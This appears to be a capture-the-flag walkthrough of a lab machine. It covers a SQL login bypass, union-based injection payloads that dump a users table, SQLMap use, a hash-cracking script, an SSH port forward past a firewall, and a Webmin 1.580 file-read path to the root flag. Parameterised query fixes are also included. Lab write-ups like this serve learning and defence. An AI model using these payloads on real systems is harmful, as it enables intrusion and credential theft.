This room covers SQLMap, cracking password hashes, reaching a firewalled service through an SSH tunnel, and escalating privileges to root.

Crack open Nmap and scan the target.

We go to the web page and enter ' or 1=1 -- - as both the username and the password; the application logs us in and redirects to portal.php. The quote closes the string the login query compares the username against, or 1=1 makes the WHERE clause true for every row, and -- - comments out the rest of the query, password check included.

SQL INJECTION - Automated and Manual

Since this is an OSCP path and SQLMap is not allowed in the exam, I'll cover both: SQL injection with and without SQLMap.

Automated Method

We're going to use SQLMap to dump the entire GameZone database. Using the page we logged into earlier, we point SQLMap at the game review search feature. First we intercept a request to the search feature with Burp Suite.

Save this request to a text file and pass it to SQLMap with -r, so it replays the request with our authenticated session cookie, for example sqlmap -r request.txt --dbms=mysql --dump. The dump includes a username and a password hash.

To crack the password hash we can paste it into CrackStation, which looks unsalted hashes up in precomputed tables. The password is Videogamer124.
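As an added example (not code from the original writeup), here is the offline equivalent of that CrackStation lookup: narrow the algorithm down from the digest length, then hash wordlist candidates with a few mangling rules until one matches. The target digest is constructed as the SHA-256 of Videogamer124 so the script runs stand-alone; that the dumped hash was unsalted SHA-256, and the tiny wordlist, are assumptions.

```python
import hashlib

# Constructed target: the SHA-256 digest of the password the walkthrough recovers.
# Treating the dumped hash as unsalted SHA-256 is an assumption; the length table
# below is how you narrow the algorithm down for a hash of unknown type.
TARGET_HASH = hashlib.sha256(b"Videogamer124").hexdigest()

# Constructed mini wordlist standing in for rockyou.txt. The real password is
# deliberately not in it verbatim: the mangling rules have to produce it.
WORDLIST = ["password", "videogamer", "agent47", "gamezone"]

# Unsalted hex digest length -> hashlib algorithms that produce that length.
ALGOS_BY_HEX_LEN = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256", "sha3_256"],
    128: ["sha512"],
}


def candidate_algorithms(hexdigest):
    """Guess the hash type from its length (no salt, no $id$ prefix)."""
    return ALGOS_BY_HEX_LEN.get(len(hexdigest), [])


def mangle(word, max_suffix=999):
    """Yield case variants of a word, bare and with a numeric suffix 0..max_suffix."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for n in range(max_suffix + 1):
            yield f"{base}{n}"


def crack(hexdigest, wordlist, max_suffix=999):
    """Return (algorithm, plaintext) for the first candidate whose digest matches, else None."""
    hexdigest = hexdigest.lower()
    for algo in candidate_algorithms(hexdigest):
        for word in wordlist:
            for guess in mangle(word, max_suffix):
                if hashlib.new(algo, guess.encode()).hexdigest() == hexdigest:
                    return algo, guess
    return None


if __name__ == "__main__":
    print(crack(TARGET_HASH, WORDLIST))
```

CrackStation only succeeds because the hash is unsalted and the password is a dictionary word with a number appended; a salted or iterated hash (bcrypt, PBKDF2) would need a proper cracker and far more time.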

Manual Method

Go to the search bar on portal.php and try these union-based payloads one at a time:

' UNION select 1,2,3 from information_schema.tables #
' UNION select 1,table_schema, table_name from information_schema.tables #
' UNION select 1,table_name, column_name from information_schema.columns #
' UNION select 1,username,pwd from users #

The first payload confirms that the search query returns three columns (which is why every later payload selects three values); the second lists every schema and table; the third lists every column, which reveals a table called "users" with the columns "username" and "pwd"; the fourth dumps them. The trailing # is MySQL's comment marker and discards the rest of the original query. If in doubt, google union-based SQL injection or watch the walkthrough video by Motasem Hamdan on his YouTube channel.
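As an added example, not code from the original writeup or from the room, the login bypass from the start and the union-based extraction above run against a constructed SQLite copy of the schema, beside the parameterised versions of the same two queries that turn the payloads back into plain data. The target itself runs MySQL, where # starts a comment; SQLite needs --, so the payloads below end in -- - instead, and SQLite has no information_schema, so the table-listing step reads sqlite_master. The "post" table, the LIKE-based search and the stored hash value are assumptions made for the demo.

```python
import sqlite3


# Constructed stand-in for the GameZone database. The "users" table and its
# "username"/"pwd" columns follow the walkthrough; the "post" table, the
# LIKE-based search and the hash value are assumptions made for this demo.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, pwd TEXT);
        INSERT INTO users VALUES ('agent47', 'constructed-sha256-hash');
        CREATE TABLE post (id INTEGER, title TEXT, review TEXT);
        INSERT INTO post VALUES (1, 'Mirror''s Edge', 'Great parkour');
        INSERT INTO post VALUES (2, 'Age of Empires II', 'Classic RTS');
    """)
    return db


# --- vulnerable versions: user input concatenated straight into the SQL -------

def login_vulnerable(db, username, password):
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND pwd = '{password}'")
    return db.execute(sql).fetchall()


def search_vulnerable(db, term):
    sql = f"SELECT id, title, review FROM post WHERE title LIKE '%{term}%'"
    return db.execute(sql).fetchall()


# --- attacker side -------------------------------------------------------------

# The quote closes the username string, "or 1=1" is true for every row, and
# "-- -" comments out the password check.
LOGIN_BYPASS = "' or 1=1 -- -"


def find_column_count(db, max_cols=10):
    """Step 1 of a UNION attack: grow 'UNION SELECT 1,2,...' until the database
    stops raising a column-count mismatch error."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(db, f"' UNION SELECT {cols} -- -")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def list_tables(db):
    """Step 2: SQLite counterpart of the walkthrough's information_schema.tables query.
    A string marker in the first column makes the injected rows easy to pick out."""
    rows = search_vulnerable(db, "' UNION SELECT 'schema',name,type FROM sqlite_master -- -")
    return sorted(r[1] for r in rows if r[0] == "schema" and r[2] == "table")


def dump_users(db):
    """Step 3: pull username/pwd through the three-column search query."""
    rows = search_vulnerable(db, "' UNION SELECT 'creds',username,pwd FROM users -- -")
    return [(r[1], r[2]) for r in rows if r[0] == "creds"]


# --- hardened versions: parameterised queries, same payloads become literal text

def login_safe(db, username, password):
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    return db.execute(sql, (username, password)).fetchall()


def search_safe(db, term):
    # The wildcard is added in code; the user's text is bound as one parameter.
    sql = "SELECT id, title, review FROM post WHERE title LIKE ?"
    return db.execute(sql, (f"%{term}%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("bypass:", login_vulnerable(db, LOGIN_BYPASS, LOGIN_BYPASS))
    print("columns:", find_column_count(db))
    print("tables:", list_tables(db))
    print("users:", dump_users(db))
    print("hardened:", login_safe(db, LOGIN_BYPASS, LOGIN_BYPASS), dump_users.__name__)
```

The column-count probe is the same thing SQLMap automates, and the string marker in the first UNION column is a handy habit: it separates injected rows from the legitimate search results at a glance.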

Moving on: since we now have a username and password (agent47 / Videogamer124), we SSH into the target machine and read the user flag.

We can see that a service is listening on port 10000 but is blocked from the outside by a firewall rule (visible in the iptables list). Using an SSH tunnel we can expose that port to ourselves locally.

For the tunnel we run ssh -L 10000:localhost:10000 <username>@<ip> (as shown above). Strictly this is local port forwarding: -L binds port 10000 on our attacking machine and relays anything sent there through the SSH session to localhost:10000 as seen from the target, so the firewall rule on the target's external interface never comes into play. A true reverse tunnel would use -R to push a port from the target back to us; -L is what we need here.

Once done, open http://localhost:10000 in your browser and you will see something running. This is Webmin, a web-based system administration interface (not a CMS); google it for more info and check whether it uses usernames and passwords.

Webmin's default username and password do not work. Trying the credentials we already have (username agent47, password Videogamer124) gets us in: the same password is reused for SSH and Webmin.

The Webmin version is also displayed: 1.580. Look up exploits for that version for further exploitation.

EXPLOITATION - Without Metasploit

Since this is an OSCP path, I will not cover Metasploit and will go the manual way. There are two methods. The first exploit can be found on Exploit-DB and in searchsploit; it is written in Ruby and is the easy way.

The exploit's instructions were a bit confusing, but all you have to do is specify the file you want to read. To read /etc/passwd you would visit:

/file/show.cgi/etc/passwd

So just visit the same path with the root flag's location appended (/file/show.cgi/root/root.txt) and we get the root flag! This works because Webmin runs as root and show.cgi serves whatever file path follows it, so any authenticated Webmin user can read files only root should see.

Another way to solve this is a Python exploit that a Google search turns up.

However, you will get errors and will have to debug and fix the exploit code, because the libraries it depends on get updated and change frequently.

I have tried to cover all the possible ways to solve this machine. I hope you learned something from this writeup — Zeus

I am a penetration tester, currently pursuing OSCP, skilled in network pentesting and developing hacking tools in Python. I share my knowledge on YouTube.